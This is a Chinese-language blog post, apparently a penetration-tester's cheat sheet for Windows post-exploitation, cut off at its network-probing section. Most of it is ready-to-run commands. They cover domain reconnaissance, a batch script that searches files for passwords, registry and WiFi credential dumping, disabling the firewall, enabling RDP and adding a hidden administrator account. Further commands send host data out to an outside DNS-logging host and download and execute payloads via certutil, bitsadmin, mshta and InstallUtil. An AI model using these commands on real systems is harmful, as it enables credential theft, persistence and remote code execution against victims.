<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.1/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","images":"/images","scheme":"Gemini","version":"8.2.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":true,"preload":true}};
  </script>
<meta name="description" content="信息搜集很重要">
<meta property="og:type" content="article">
<meta property="og:title" content="在Windows中找敏感信息">
<meta property="og:url" content="http://example.com/2021/01/14/%E5%9C%A8Windows%E4%B8%AD%E6%89%BE%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF/index.html">
<meta property="og:site_name" content="隐秘行动">
<meta property="og:description" content="信息搜集很重要">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2021-01-14T04:01:51.000Z">
<meta property="article:modified_time" content="2021-01-14T08:13:12.700Z">
<meta property="article:author" content="nicaishui">
<meta property="article:tag" content="Windows">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://example.com/2021/01/14/%E5%9C%A8Windows%E4%B8%AD%E6%89%BE%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>
<title>在Windows中找敏感信息 | 隐秘行动</title>
  




  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">隐秘行动</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-主页"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>主页</a></li>
        <li class="menu-item menu-item-关于"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
        <li class="menu-item menu-item-标签"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-分类"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-归档"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8CMD%E5%91%BD%E4%BB%A4"><span class="nav-number">1.</span> <span class="nav-text">常用CMD命令</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Windows%E7%9A%84%E6%9C%AC%E5%9C%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="nav-number">2.</span> <span class="nav-text">Windows的本地命令执行</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9F%9F%E5%B8%B8%E7%94%A8%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86"><span class="nav-number">3.</span> <span class="nav-text">域常用信息搜集</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86"><span class="nav-number">4.</span> <span class="nav-text">环境信息搜集</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AF%86%E7%A0%81%E6%90%9C%E9%9B%86"><span class="nav-number">5.</span> <span class="nav-text">密码搜集</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%85%B3%E9%98%B2%E7%81%AB%E5%A2%99"><span class="nav-number">6.</span> <span class="nav-text">关防火墙</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%91%BD%E4%BB%A4%E5%A4%96%E5%B8%A6"><span class="nav-number">7.</span> <span class="nav-text">命令外带</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RDP%E7%9B%B8%E5%85%B3"><span class="nav-number">8.</span> <span class="nav-text">RDP相关</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%B0%E5%BB%BA%E7%94%A8%E6%88%B7%E7%9B%B8%E5%85%B3"><span class="nav-number">9.</span> <span class="nav-text">新建用户相关</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%8B%E8%BD%BD%E6%96%87%E4%BB%B6"><span class="nav-number">10.</span> <span class="nav-text">下载文件</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BD%91%E7%BB%9C%E6%8E%A2%E6%B5%8B"><span class="nav-number">11.</span> <span class="nav-text">网络探测</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%A5%E4%B8%8A"><span class="nav-number">12.</span> <span class="nav-text">以上</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="nicaishui"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">nicaishui</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
          <span class="site-state-item-count">8</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/fakename" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;fakename" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:fakename@gmail.com" title="E-Mail → mailto:fakename@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://weibo.com/fakename" title="Weibo → https:&#x2F;&#x2F;weibo.com&#x2F;fakename" rel="noopener" target="_blank"><i class="fab fa-weibo fa-fw"></i>Weibo</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://twitter.com/fakename" title="Twitter → https:&#x2F;&#x2F;twitter.com&#x2F;fakename" rel="noopener" target="_blank"><i class="fab fa-twitter fa-fw"></i>Twitter</a>
      </span>
  </div>



        </div>
      </div>
        <div class="back-to-top animated" role="button">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/01/14/%E5%9C%A8Windows%E4%B8%AD%E6%89%BE%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="nicaishui">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="隐秘行动">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          在Windows中找敏感信息
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2021-01-14 12:01:51 / 修改时间：16:13:12" itemprop="dateCreated datePublished" datetime="2021-01-14T12:01:51+08:00">2021-01-14</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/" itemprop="url" rel="index"><span itemprop="name">信息搜集</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class=""></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>7.2k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>7 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p><em>信息搜集很重要</em><a id="more"></a></p>
<h2 id="常用CMD命令"><a href="#常用CMD命令" class="headerlink" title="常用CMD命令"></a>常用CMD命令</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">whoami # 查看当前用户</span><br><span class="line">net user # 查看所有用户</span><br><span class="line">query user # 查看当前在线用户</span><br><span class="line">ipconfig &#x2F;all # 查看当前主机的主机名&#x2F;IP&#x2F;DNS等信息</span><br><span class="line">route print # 查看路由表信息</span><br><span class="line">netstat -ano # 查看端口开放情况</span><br><span class="line">arp -a # 查看arp解析情况</span><br><span class="line">tasklist &#x2F;svc # 查看进程及对应服务名</span><br><span class="line">net localgroup administrators # 查看管理员组成员</span><br><span class="line">systeminfo # 查看系统信息含补丁信息</span><br><span class="line">net use # 查看ipc连接情况</span><br><span class="line">net view # 查看匿名共享情况</span><br><span class="line">netsh firewall show state # 查看防火墙状态</span><br><span class="line">cmdkey &#x2F;l # 查看当前保存的登陆凭证</span><br></pre></td></tr></table></figure>
<h2 id="Windows的本地命令执行"><a href="#Windows的本地命令执行" class="headerlink" title="Windows的本地命令执行"></a>Windows的本地命令执行</h2><p>可用来替代cmd</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">forfiles &#x2F;c c:\windows\system32\calc.exe	#无限运行</span><br><span class="line">pcalua.exe -a c:\windows\system32\calc.exe	</span><br><span class="line">powershell SyncAppvPublishingServer.vbs &quot;n; Start-Process c:\windows\system32\calc.exe&quot;</span><br><span class="line">cmd.exe &#x2F;c &quot;ping 127.0.0.1&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;windows&#x2F;system32&#x2F;calc.exe&quot;</span><br><span class="line">conhost C:\Windows\System32\calc.exe</span><br><span class="line">explorer.exe C:\Users\keefe\desktop\1.exe</span><br></pre></td></tr></table></figure>
<h2 id="域常用信息搜集"><a href="#域常用信息搜集" class="headerlink" title="域常用信息搜集"></a>域常用信息搜集</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">- net config workstation #查看当前登录域</span><br><span class="line">- net user &#x2F;domain # 获得所有域用户列表</span><br><span class="line">- net view &#x2F;domain # 查看所有的域</span><br><span class="line">- net view &#x2F;domain:XXX # 查看该域内所有主机</span><br><span class="line">- net group &#x2F;domain # 查看所有域用户组列表</span><br><span class="line">- net group &quot;domain computers&quot; &#x2F;domain # 查看域内所有的主机名</span><br><span class="line">- net group &quot;domain admins&quot; &#x2F;domain # 查看所有域管理员</span><br><span class="line">- net group &quot;domain controllers&quot; &#x2F;domain # 查看所有域控制器</span><br><span class="line">- net group &quot;enterprise admins&quot; &#x2F;domain # 查看所有企业管理员</span><br><span class="line">- nltest &#x2F;domain_trusts # 获取域信任信息</span><br><span class="line">- net time &#x2F;domain # 查看当前登录域</span><br><span class="line">- net accounts &#x2F;domain # 查看域密码策略</span><br><span class="line">- dsquery server # 寻找目录中的域控制器</span><br><span class="line">- netdom query pdc # 查看域控制器主机名</span><br><span class="line">- wmic useraccount get &#x2F;all #获取域内用户的详细信息</span><br></pre></td></tr></table></figure>
<h2 id="环境信息搜集"><a href="#环境信息搜集" class="headerlink" title="环境信息搜集"></a>环境信息搜集</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">- nbtscan.exe xx.xx.xx.xx&#x2F;24 # 查看c段机器</span><br><span class="line">- csvde.exe -f 1.csv -k # 批量导入&#x2F;导出AD用户</span><br><span class="line">- setspn.exe -T xx.xx.xx.xx -Q *&#x2F;* # 查看当前域内所有spn</span><br><span class="line">- netstat -ano  </span><br></pre></td></tr></table></figure>
<h2 id="密码搜集"><a href="#密码搜集" class="headerlink" title="密码搜集"></a>密码搜集</h2><p>密码文件</p>
<p>写了一个自动搜索像密码文件的脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line"></span><br><span class="line">set &#x2F;p pwd&#x3D;&quot;输入盘符,示例 C:&#x2F; &gt;&quot;</span><br><span class="line">for &#x2F;R %pwd% %%i in (*.properties) do @findstr &quot;password&#x3D;&quot; &quot;%%i&quot; &amp;&amp; @echo %%i C:&#x2F;temp&#x2F;1.txt</span><br><span class="line">for &#x2F;R %pwd% %%i in (*.ini) do @findstr &quot;password&#x3D;&quot; &quot;%%i&quot; &amp;&amp; @echo %%i &gt;&gt; C:&#x2F;temp&#x2F;1.txt</span><br><span class="line">for &#x2F;R %pwd% %%i in (*.xml) do @findstr &quot;password&#x3D;&quot; &quot;%%i&quot; &amp;&amp; @echo %%i &gt;&gt; C:&#x2F;temp&#x2F;1.txt</span><br><span class="line">for &#x2F;R %pwd% %%i in (*.config) do @findstr &quot;password&#x3D;&quot; &quot;%%i&quot; &amp;&amp; @echo %%i &gt;&gt; C:&#x2F;temp&#x2F;1.txt</span><br><span class="line">for &#x2F;R %pwd% %%i in (*.conf) do @findstr &quot;password&#x3D;&quot; &quot;%%i&quot; &amp;&amp; @echo %%i &gt;&gt; C:&#x2F;temp&#x2F;1.txt</span><br><span class="line">for &#x2F;R %pwd% %%i in (*.properties) do @findstr &quot;pass&#x3D;&quot; &quot;%%i&quot; &amp;&amp; @echo %%i &gt;&gt; C:&#x2F;temp&#x2F;1.txt</span><br><span class="line">for &#x2F;R %pwd% %%i in (*.ini) do @findstr &quot;pass&#x3D;&quot; &quot;%%i&quot; &amp;&amp; @echo %%i &gt;&gt; C:&#x2F;temp&#x2F;1.txt</span><br><span class="line">for &#x2F;R %pwd% %%i in (*.xml) do @findstr &quot;pass&#x3D;&quot; &quot;%%i&quot; &amp;&amp; @echo %%i &gt;&gt; C:&#x2F;temp&#x2F;1.txt</span><br><span class="line">for &#x2F;R %pwd% %%i in (*.config) do @findstr &quot;pass&#x3D;&quot; &quot;%%i&quot; &amp;&amp; @echo %%i &gt;&gt; C:&#x2F;temp&#x2F;1.txt</span><br><span class="line">for &#x2F;R %pwd% %%i in (*.conf) do @findstr &quot;pass&#x3D;&quot; &quot;%%i&quot; &amp;&amp; @echo %%i &gt;&gt; C:&#x2F;temp&#x2F;1.txt</span><br><span class="line">pause</span><br></pre></td></tr></table></figure>
<p>还可以用下面的方式（抄的）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">1. 查看 Windows 文件</span><br><span class="line">1）WDS</span><br><span class="line">Windows Deployment Services (Windows 部署服务，简称：WDS)，是提供给计算机管理员再企业或组织环境中为计算机部署操作系统的一种工具。</span><br><span class="line">通过 WDS 我们可以轻松地为客户端批量部署操作系统，并可管理影响和无人参与安装脚本，或提供需人参与和无人参与的安装选项。如：通过网络为一台计算机执行需要人参与或无人参与的系统安装过程；映像捕获计算机系统并将其部署到其他计算机上，而不受 HAL 的影响。</span><br><span class="line">但它存在一个问题，就是本地管理员密码以明文形式或 base64 编码存储在诸如以下位置：</span><br><span class="line">C:\unattend.xml</span><br><span class="line">C:\Windows\Panther\Unattend.xml</span><br><span class="line">C:\Windows\Panther\Unattend\Unattend.xml</span><br><span class="line">C:\Windows\System32\sysprep.inf</span><br><span class="line">C:\Windows\System32\sysprep\sysprep.xml</span><br><span class="line">有一个 MSF 的模块可以通过其搜寻凭证（msf没找到不知道为啥）</span><br><span class="line"></span><br><span class="line">2）IIS服务器</span><br><span class="line">如果系统是采用 IIS 服务器部署的，可以看看 web.config ，因为它也可能以明文形式包含管理员密码。它本地文件地址通常如下：</span><br><span class="line">C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config</span><br><span class="line">C:\inetpub\wwwroot\web.config</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">2. 命令搜索关键字</span><br><span class="line"></span><br><span class="line">4）注册表里查找关键字</span><br><span class="line">reg query HKLM &#x2F;f password &#x2F;t REG_SZ &#x2F;s</span><br><span class="line">reg query HKCU &#x2F;f password &#x2F;t REG_SZ &#x2F;s</span><br><span class="line">reg query &quot;HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon&quot;</span><br><span class="line">reg query &quot;HKLM\SYSTEM\Current\ControlSet\Services\SNMP&quot;</span><br><span class="line">reg query &quot;HKCU\Software\SimonTatham\PuTTY\Sessions&quot;</span><br><span class="line">reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 &#x2F;v password</span><br><span class="line">5）查找可写目录</span><br><span class="line">dir &#x2F;a-r-d &#x2F;s &#x2F;b</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">3. PowerSploit</span><br><span class="line">PowerSploit 有些模块可以检查各种文件和注册表中的凭据。</span><br><span class="line">Get-UnattendedInstallFile</span><br><span class="line">Get-Webconfig</span><br><span class="line">Get-ApplicationHost</span><br><span class="line">Get-SiteListPassword</span><br><span class="line">Get-CachedGPPPassword</span><br><span class="line">Get-RegistryAutoLogon</span><br></pre></td></tr></table></figure>
<p>其他密码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">dir &#x2F;s &#x2F;a \域控IP\SYSVOL*.xml # 获取域里面所有机子的本地管理员账号密码</span><br><span class="line"></span><br><span class="line">netsh wlan show profiles # 查看连接过的wifi名称</span><br><span class="line"></span><br><span class="line">netsh wlan show profile name&#x3D;&quot;wifi名称&quot; key&#x3D;clear # 查看wifi的密码</span><br><span class="line"></span><br><span class="line">dir &#x2F;a %userprofile%\AppData\Local\Microsoft\Credentials* # 查看RDP连接凭证</span><br><span class="line"></span><br><span class="line">laZagne.exe all -oN # 本地wifi&#x2F;浏览器等密码</span><br><span class="line"></span><br><span class="line">dir %APPDATA%\Microsoft\Windows\Recent # 查看最近打开的文档</span><br></pre></td></tr></table></figure>
<h2 id="关防火墙"><a href="#关防火墙" class="headerlink" title="关防火墙"></a>关防火墙</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netsh firewall set opmode disable</span><br></pre></td></tr></table></figure>
<h2 id="命令外带"><a href="#命令外带" class="headerlink" title="命令外带"></a>命令外带</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cmd &#x2F;c &quot;ipconfig &gt; abcde &amp;&amp; set &#x2F;p xx&#x3D;&lt;abcde &amp;&amp; certutil -urlcache -split -f http:&#x2F;&#x2F;hrgjkb.ceye.io?a&#x3D;%xx%</span><br><span class="line"></span><br><span class="line">cmd &#x2F;c &#x2F;v &quot;ipconfig &gt; abcde &amp;&amp; set &#x2F;p xx&#x3D;&lt;abcde &amp;&amp; certutil -urlcache -split -f http:&#x2F;&#x2F;hrgjkb.ceye.io?a&#x3D;!xx!</span><br></pre></td></tr></table></figure>
<h2 id="RDP相关"><a href="#RDP相关" class="headerlink" title="RDP相关"></a>RDP相关</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">开启</span><br><span class="line">REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server &#x2F;v fDenyTSConnections &#x2F;t REG_DWORD &#x2F;d 0 &#x2F;f</span><br><span class="line">查端口</span><br><span class="line">REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server\WinStations\RDP-Tcp &#x2F;v PortNumber</span><br></pre></td></tr></table></figure>
<h2 id="新建用户相关"><a href="#新建用户相关" class="headerlink" title="新建用户相关"></a>新建用户相关</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">net user wocaini Wocaini121.. &#x2F;add</span><br><span class="line"></span><br><span class="line">加入管理员组</span><br><span class="line">net localgroup administrators wocaini &#x2F;add</span><br><span class="line"></span><br><span class="line"> 加入远程桌面用户组</span><br><span class="line">net localgroup &quot;remote desktop users&quot; wocaini &#x2F;add</span><br></pre></td></tr></table></figure>
<h2 id="下载文件"><a href="#下载文件" class="headerlink" title="下载文件"></a>下载文件</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Pcalua -a \\x.x.x.x\777.exe</span><br><span class="line">cmd &#x2F;c certutil -urlcache -split -f http:&#x2F;&#x2F;x.x.x.x&#x2F;%USERNAME%+%COMPUTERNAME%+%HOMEPATH%</span><br><span class="line">bitsadmin &#x2F;transfer myDownLoadJob &#x2F;download &#x2F;priority normal http:&#x2F;&#x2F;x.x.x.x c:\temp\777.exe</span><br><span class="line">powershell Start-BitsTransfer -Source &quot;http:&#x2F;&#x2F;10.0.2.21&#x2F;pentestlab.exe&quot; -Destination &quot;C:\tmp\pentestlab.exe&quot;</span><br><span class="line">mshta vbscript:Close(Execute(&quot;GetObject(&quot;&quot;script: http:&#x2F;&#x2F;x.x.x.x&#x2F;hacktest&quot;&quot;)&quot;))</span><br><span class="line">certutil -urlcache -split -f http:&#x2F;&#x2F;x.x.x.x&#x2F;key.txt payload</span><br><span class="line">certutil -urlcache -split -f http:&#x2F;&#x2F;webserver&#x2F;payload.b64 payload.b64 &amp; certutil -decode payload.b64 payload.dll &amp; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil &#x2F;logfile&#x3D; &#x2F;LogToConsole&#x3D;false &#x2F;u payload.dll</span><br><span class="line">certutil -urlcache -split -f http:&#x2F;&#x2F;webserver&#x2F;payload.b64 payload.b64 &amp; certutil -decode payload.b64 payload.exe &amp; payload.exe</span><br><span class="line">powershell &quot;Import-Module BitsTransfer;start-bitstransfer http:&#x2F;&#x2F;uee.me&#x2F;crAJs cd.bat&quot;|cd.bat</span><br></pre></td></tr></table></figure>
<h2 id="网络探测"><a href="#网络探测" class="headerlink" title="网络探测"></a>网络探测</h2><p>改进了一下网上的脚本</p>
